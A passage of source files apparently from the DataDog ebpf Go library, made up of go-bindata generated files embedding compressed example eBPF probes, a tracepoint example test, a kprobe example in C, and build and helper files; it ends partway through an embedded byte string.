// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"prog1.o": {Func: bindataProg1o, Children: map[string]*bintree{}},
"prog2.o": {Func: bindataProg2o, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>example_program_test.go<|end_filename|>
// +build linux
package ebpf_test
import (
"context"
"fmt"
"io/ioutil"
"os"
"strconv"
"time"
"strings"
"github.com/DataDog/ebpf"
"github.com/DataDog/ebpf/asm"
"github.com/DataDog/ebpf/perf"
"golang.org/x/sys/unix"
)
// getTracepointID returns the system specific ID for the tracepoint sys_enter_open.
func getTracepointID() (uint64, error) {
data, err := ioutil.ReadFile("/sys/kernel/debug/tracing/events/syscalls/sys_enter_open/id")
if err != nil {
return 0, fmt.Errorf("failed to read tracepoint ID for 'sys_enter_open': %v", err)
}
tid := strings.TrimSuffix(string(data), "\n")
return strconv.ParseUint(tid, 10, 64)
}
// Example_program demonstrates how to attach an eBPF program to a tracepoint.
// The program will be attached to the sys_enter_open syscall and print out the integer
// 123 everytime the sycall is used.
func Example_program() {
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
defer cancel()
events, err := ebpf.NewMap(&ebpf.MapSpec{
Type: ebpf.PerfEventArray,
Name: "pureGo",
})
if err != nil {
panic(fmt.Errorf("could not create event map: %v\n", err))
}
defer events.Close()
rd, err := perf.NewReader(events, os.Getpagesize())
if err != nil {
panic(fmt.Errorf("could not create event reader: %v", err))
}
defer rd.Close()
go func() {
for {
select {
case <-ctx.Done():
return
default:
}
record, err := rd.Read()
if err != nil {
if perf.IsClosed(err) {
return
}
panic(fmt.Errorf("could not read from reader: %v", err))
}
fmt.Println(record)
}
}()
ins := asm.Instructions{
// store the integer 123 at FP[-8]
asm.Mov.Imm(asm.R2, 123),
asm.StoreMem(asm.RFP, -8, asm.R2, asm.Word),
// load registers with arguments for call of FnPerfEventOutput
asm.LoadMapPtr(asm.R2, events.FD()),
asm.LoadImm(asm.R3, 0xffffffff, asm.DWord),
asm.Mov.Reg(asm.R4, asm.RFP),
asm.Add.Imm(asm.R4, -8),
asm.Mov.Imm(asm.R5, 4),
// call FnPerfEventOutput
asm.FnPerfEventOutput.Call(),
// set exit code to 0
asm.Mov.Imm(asm.R0, 0),
asm.Return(),
}
prog, err := ebpf.NewProgram(&ebpf.ProgramSpec{
Name: "sys_enter_open",
Type: ebpf.TracePoint,
License: "GPL",
Instructions: ins,
})
if err != nil {
panic(fmt.Errorf("could not create new ebpf program: %v", err))
}
defer prog.Close()
tid, err := getTracepointID()
if err != nil {
panic(fmt.Errorf("could not get tracepoint id: %v", err))
}
attr := unix.PerfEventAttr{
Type: unix.PERF_TYPE_TRACEPOINT,
Config: tid,
Sample_type: unix.PERF_SAMPLE_RAW,
Sample: 1,
Wakeup: 1,
}
pfd, err := unix.PerfEventOpen(&attr, -1, 0, -1, unix.PERF_FLAG_FD_CLOEXEC)
if err != nil {
panic(fmt.Errorf("unable to open perf events: %v", err))
}
if _, _, errno := unix.Syscall(unix.SYS_IOCTL, uintptr(pfd), unix.PERF_EVENT_IOC_ENABLE, 0); errno != 0 {
panic(fmt.Errorf("unable to enable perf events: %v", err))
}
if _, _, errno := unix.Syscall(unix.SYS_IOCTL, uintptr(pfd), unix.PERF_EVENT_IOC_SET_BPF, uintptr(prog.FD())); errno != 0 {
panic(fmt.Errorf("unable to attach bpf program to perf events: %v", err))
}
<-ctx.Done()
if _, _, errno := unix.Syscall(unix.SYS_IOCTL, uintptr(pfd), unix.PERF_EVENT_IOC_DISABLE, 0); errno != 0 {
panic(fmt.Errorf("unable to disable perf events: %v", err))
}
}
<|start_filename|>manager/examples/activated_probes/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
SEC("kprobe/vfs_mkdir")
int kprobe_vfs_mkdir(void *ctx)
{
bpf_printk("mkdir (vfs hook point)\n");
return 0;
};
SEC("kprobe/utimes_common")
int kprobe_utimes_common(void *ctx)
{
bpf_printk("utimes_common\n");
return 0;
};
SEC("kprobe/vfs_opennnnnn")
int kprobe_open(void *ctx)
{
bpf_printk("vfs_open\n");
return 0;
};
SEC("kprobe/exclude")
int kprobe_exclude(void *ctx)
{
bpf_printk("exclude\n");
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/testdata/Makefile<|end_filename|>
LLVM_PREFIX ?= /usr/bin
CLANG ?= $(LLVM_PREFIX)/clang
all: rewrite.elf
clean:
-$(RM) *.elf
%.elf : %.c
$(CLANG) -target bpf -O2 -g \
-Wall -Werror \
-c $< -o $@
<|start_filename|>manager/examples/programs/uprobe/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\x3d\x6f\x13\x41\x10\x7d\x6b\x9b\xc4\x24\x29\x6c\xaa\xe4\x02\x92" +
"\xc5\x0f\x58\x48\x0a\x6a\xcb\x12\xa6\x49\x11\xa1\x48\x94\xa7\xb5\x6f\x21\x16\xbe\xbb\xe8\xee\xf8\x74\x24\x2a\xfa" +
"\x34\x48\x74\x88\x5f\xe1\x92\xbf\xe2\x12\x89\x06\x2a\x10\x48\x2c\xda\xcd\xae\x6f\x99\xdc\xe9\x32\xd2\x7a\x67\xde" +
"\xce\x9b\x79\x3b\x5e\xdd\xbb\x87\x47\xe3\x16\x63\x70\xc6\xf0\x13\x65\x54\xda\x45\xab\xf4\x87\xf6\x77\x07\x0c\x4b" +
"\x06\x44\x5b\xc0\xf3\xe0\x97\xd2\xe8\x2e\x03\x06\x91\x2c\xb4\x2f\xa7\x85\x5c\x04\xdf\x4b\x7c\x9a\xc6\xda\x8f\x45" +
"\x12\x2d\x82\xaf\x6b\x3c\x91\xaf\x06\xda\x9f\x88\xfc\x74\x11\xac\x0c\xbe\xb4\x22\xf2\xe0\xb7\x89\xbf\x7c\xbe\x8c" +
"\x37\x19\xb0\x52\x4a\x2d\x5b\xc0\x3e\x80\xf7\x00\x36\x74\xbe\xd5\xf6\x81\xe8\xd6\xb5\x75\x5d\xdd\x5b\xf7\xd5\xda" +
"\xb4\xae\x68\x0b\x8f\x8e\x8f\x80\xbf\x4a\xa9\x4f\xdf\x18\x76\x09\xcf\xb4\xf7\x0f\x3a\xde\xea\x02\xe8\x5d\xc2\x3d" +
"\x97\xff\xf6\x31\xba\xe7\xdb\x6c\x47\xdf\xc9\x2e\x67\x1f\x2b\xe6\x49\xed\xd8\x94\xfe\xa1\xaa\xce\xda\x68\x5f\xc1" +
"\xf6\x00\xf4\x71\x63\x1d\x77\x50\xea\xe9\x9b\x89\xfc\x8f\xdf\x05\x70\xcb\xab\xe3\x34\xdd\xf6\xee\x6b\xfe\x62\x5e" +
"\xc8\xd7\x05\xf8\xe8\x64\xcc\xb5\x13\xbe\x94\x59\x3e\x4b\x13\x84\xf3\xd9\x54\x26\xb9\xc4\x8b\xb3\x2c\x9d\xc8\x30" +
"\x93\x22\x9a\xcf\x12\x17\xdf\x5b\xc7\x3c\x93\x73\x2e\x4f\xc3\xa7\x99\x88\x25\x62\x31\x4b\xf8\x14\x3c\x2f\xb2\x42" +
"\x4c\xc0\xf3\x37\xb1\xd9\x47\x27\x63\xf0\x2c\x8d\x44\x21\xf4\xd9\x01\x3f\x78\x70\x8d\x29\x35\xdb\x13\x33\xaf\xab" +
"\xd6\xb3\xef\xf7\x9c\xe0\xf4\xad\x33\xbb\x36\x08\x3e\xac\xe9\xd7\x21\xf1\x61\x03\x9f\xbe\x85\x2e\x89\xe7\x96\x7f" +
"\x48\xf0\x95\xdd\xf7\x09\xde\x23\xf7\x08\xac\x4f\x67\xf0\xa7\x46\x2f\xbd\x7f\xbf\x86\xef\x12\x29\x9f\xc6\xcf\x2a" +
"\x6a\x9a\x3c\x0b\xee\x35\xf4\xdf\xac\xe1\xdf\xb1\xe0\xa0\x81\x3f\xf6\xdf\xb2\x67\x43\x9b\x78\x9f\xe0\x74\xfe\x23" +
"\x00\x37\x2b\xfa\xbb\x82\x6e\xde\xdb\x36\xcf\xf1\x1d\x1e\x56\xf4\xd6\x76\x66\xfb\x5f\x78\xba\xdb\x1e\xdf\x7d\x2f" +
"\xfe\x05\x00\x00\xff\xff\x0f\x7a\x6f\x8a\x90\x05\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1424,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295165, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>utsname_int8.go<|end_filename|>
// +build linux,amd64 linux,arm64 linux,386
package ebpf
func utsnameStr(in []int8) string {
out := make([]byte, len(in))
for i := 0; i < len(in); i++ {
if in[i] == 0 {
break
}
out = append(out, byte(in[i]))
}
return string(out)
}
<|start_filename|>manager/testdata/common.h<|end_filename|>
#pragma once
typedef unsigned int uint32_t;
typedef unsigned long uint64_t;
#define __section(NAME) __attribute__((section(NAME), used))
#define BPF_MAP_TYPE_ARRAY (1)
#define BPF_MAP_TYPE_PERF_EVENT_ARRAY (4)
#define BPF_MAP_TYPE_ARRAY_OF_MAPS (12)
#define BPF_MAP_TYPE_HASH_OF_MAPS (13)
#define BPF_F_NO_PREALLOC (1U << 0)
#define BPF_F_CURRENT_CPU (0xffffffffULL)
struct map {
uint32_t type;
uint32_t key_size;
uint32_t value_size;
uint32_t max_entries;
uint32_t flags;
uint32_t inner_map_idx;
uint32_t dummy;
};
static void* (*map_lookup_elem)(const void *map, const void *key) = (void*)1;
static int (*perf_event_output)(const void *ctx, const void *map, uint64_t index, const void *data, uint64_t size) = (void*)25;
static uint32_t (*get_smp_processor_id)(void) = (void*)8;
<|start_filename|>manager/examples/tests_and_benchmarks/utils.go<|end_filename|>
package main
import (
"bytes"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"io"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
<|start_filename|>manager/examples/programs/socket/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\xcf\x6b\x13\x41\x14\xfe\x26\x89\x69\xb4\x3d\x54\xa1\x50\x83\x87" +
"\x80\xf7\xd1\x7a\xa8\x47\x43\xc1\xe8\x21\x87\x22\xc5\x9b\x2c\xeb\x76\x8a\x8b\xf9\x21\xbb\x4b\xad\x56\x50\x04\xef" +
"\x5e\x3c\x8b\x7f\x45\x8e\xfa\x4f\x78\xf3\x90\xa3\xe0\xa5\x82\x20\x5e\x1c\x79\xe3\x9b\xee\xf0\xb2\x4b\xf2\xc1\xe4" +
"\xbd\xf7\xcd\x7c\xf3\x7e\x64\xd8\xd7\x77\x87\x83\x86\x52\xf0\x50\xf8\x8d\x32\x2a\x71\xd2\x28\xfd\x3e\xff\x6e\x40" +
"\x61\xa6\x80\x63\x73\x78\x29\xe9\x9e\x59\x62\xb7\x15\x60\x8a\x5e\x46\xbe\x49\x4c\x7a\xda\xfd\x7e\xce\x4f\xcc\xf3" +
"\x1e\xf9\xcf\xe2\xe4\xe9\x69\x77\xee\xf8\x19\x27\xcb\xbb\xbf\x5c\xfc\xf9\xd3\xff\x78\x4d\x01\x73\x6b\xed\xac\x01" +
"\x6c\x01\x78\x07\xa0\x4d\xe7\xb9\x86\x0f\x6c\xe9\x4e\xba\x8f\x72\x52\x3e\xaa\x05\xf7\xf6\x87\xb4\xf7\xd7\x5a\xfb" +
"\xf1\x87\xc2\xb6\xe8\xc5\xa5\x0c\x37\x5a\xc1\xea\x00\xd8\x2c\xcf\x7a\x57\xbd\x7c\x80\xce\xab\x75\xb5\x41\xbd\xf0" +
"\xf2\x78\x53\x31\x2f\x89\x87\xee\xfa\x9f\xb6\x6a\xaf\x89\xe6\x02\x77\x07\xc0\x65\x5c\x38\x8f\x5b\x6c\x77\x1d\xdf" +
"\x5e\xe0\xa9\xce\x2b\xc1\x3d\xbe\xa6\x6b\x41\xcf\xee\x2f\xd4\x85\x39\x29\xa0\xf7\x0e\x06\x9a\x9c\x7c\x4a\xb3\x8b" +
"\xc8\x44\x47\xe9\xa8\x30\x19\x53\x37\x42\x2a\x3a\x36\x59\x9e\x4e\x27\x88\x46\x69\x62\x26\xb9\x81\xce\xcc\x48\x9b" +
"\x27\xd1\x51\x16\x8f\x0d\xc6\x71\x3a\xd1\x09\x74\x5e\x64\x45\xfc\x18\x3a\x7f\x31\x76\x76\xef\x60\x00\x9d\x4d\x0f" +
"\xe3\x22\xa6\xbd\x1d\xbd\xb3\xbb\xc2\xac\x56\xc1\x23\x37\xb7\x45\x9c\xf1\x7b\x7a\x2b\x78\xf9\xa6\x15\xaf\xb6\xe0" +
"\xfb\x35\xf9\x5a\x22\xbe\xbe\x44\x2f\xdf\x44\x47\xc4\x19\xeb\x6f\x09\xfe\x0b\xdb\x2d\xc1\x6f\x8a\x3e\xfa\xec\xcb" +
"\x19\x7c\xad\xa9\x57\xf6\x7f\xbb\x46\xff\xad\x46\x2f\xe3\x71\xc5\x9d\x84\x39\xdb\xab\x4b\xf2\xaf\xd5\xe8\xff\xb0" +
"\xed\x2d\xd1\x0f\xc3\x37\x1d\xa0\xc7\x07\x6f\x0a\x5e\xce\xff\x3e\x80\x8b\x55\xf5\xb3\xde\xcf\x7b\x9d\xcf\x79\xbd" +
"\xe7\x4d\x45\x6e\xc2\x3e\xeb\xdf\x07\x75\x37\x03\xbd\xff\x6e\xfc\x0b\x00\x00\xff\xff\x23\x8c\xef\x81\x78\x05\x00" +
"\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1400,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295120, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/clone_vs_add_hook/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x56\x3f\x68\xd4\x50\x18\xff\xd2\xeb\xf5\xce\x56\xe4\xaa\x20\xd7\x70" +
"\x43\x44\x84\x16\x21\xb5\xa2\x22\x82\x58\x2a\xd6\xa5\x83\x48\x87\x6e\x47\x7a\x4d\x6d\xc8\xe5\x0f\x49\xac\xb6\x29" +
"\x28\x88\x83\x9b\x8b\x83\x2e\xe2\x9f\xcd\x41\xb7\xe2\x74\x37\x76\xec\x22\x38\xba\x08\x45\x17\x75\xb1\x93\x91\xef" +
"\xe5\x25\xf9\xfa\x2e\xb1\xd7\x4d\xc1\x0f\xae\x79\xdf\xef\xbd\xef\x7d\xdf\xf7\x7b\xbf\xbc\xf4\xde\xb5\xb9\xd9\x01" +
"\x49\x82\xc4\x24\xf8\x09\x99\x97\xd9\x74\x95\x8c\xf9\xdf\x51\x90\xa0\x73\x3c\xc6\xea\xa5\xbd\xeb\xc3\x4b\xbb\x11" +
"\x3e\x37\x25\x80\xa5\x61\x00\x53\xde\x61\x7e\x5d\x02\x08\x34\x3b\xc0\xb1\x72\x59\x39\x15\xca\x9f\x52\x5c\xb1\xd6" +
"\x9a\x38\x6e\x39\xb6\x1f\xca\x1f\x53\xdc\x75\x0c\x1b\xc7\xc1\x84\xb2\x11\xca\xdb\x29\xbe\xec\x2b\x2b\x38\x76\x1c" +
"\x53\x09\xe5\xad\x14\xb7\xcc\x25\x03\xc7\x9e\x32\xbe\x1a\xca\xdd\xb4\x0e\x34\x5f\xfe\xc2\xfc\xce\x8b\xd8\xaf\x48" +
"\x00\xdd\x28\x8a\x36\x07\x00\x4e\x03\xc0\x43\x00\x18\xe2\x4f\x6c\xf9\x16\xd6\x09\x00\x77\xf8\xb3\xf3\x9a\xc7\x0d" +
"\x02\xec\x46\x51\xd4\xd1\x78\xff\x03\x7b\xfb\xef\x70\x3e\x36\xcb\xf1\x3e\xb8\xdf\x18\xfa\x7c\xfe\x49\xb2\xee\x2f" +
"\xe4\xcf\xb3\xfe\x1d\xfe\xb0\xae\x09\xc6\xcf\xb7\xb4\x7e\xc7\x54\x5c\xd6\x97\x61\x07\x21\xe1\xcd\x6f\x69\x6d\x1c" +
"\xb7\x95\x15\x87\xf2\x16\xdc\xf6\x18\x3f\xca\xb8\xbf\x46\x79\xcb\x74\xe4\xe9\x09\x6f\x19\x0f\x3f\x7a\x78\xd8\xe6" +
"\x3c\x9c\x24\x3c\x88\xf5\x0e\xc2\x7f\xfb\x93\x21\xe7\xa8\x3b\xd4\x26\xea\x12\xb5\x8b\xba\x45\x6d\xa3\xae\x51\xfb" +
"\xa8\x7b\x7c\x27\xd0\x50\xab\x07\x59\x1f\xef\xef\xe9\x78\xe6\x78\xde\xa8\x89\x36\x0d\x1d\x86\xeb\x37\xe6\x00\x7e" +
"\x45\x51\xf4\xfc\xab\x04\x75\xa1\x3e\x76\xfc\x74\x62\x90\xfc\x50\xa8\xb5\x18\xae\x25\xeb\xd7\x6f\x42\x75\x63\x44" +
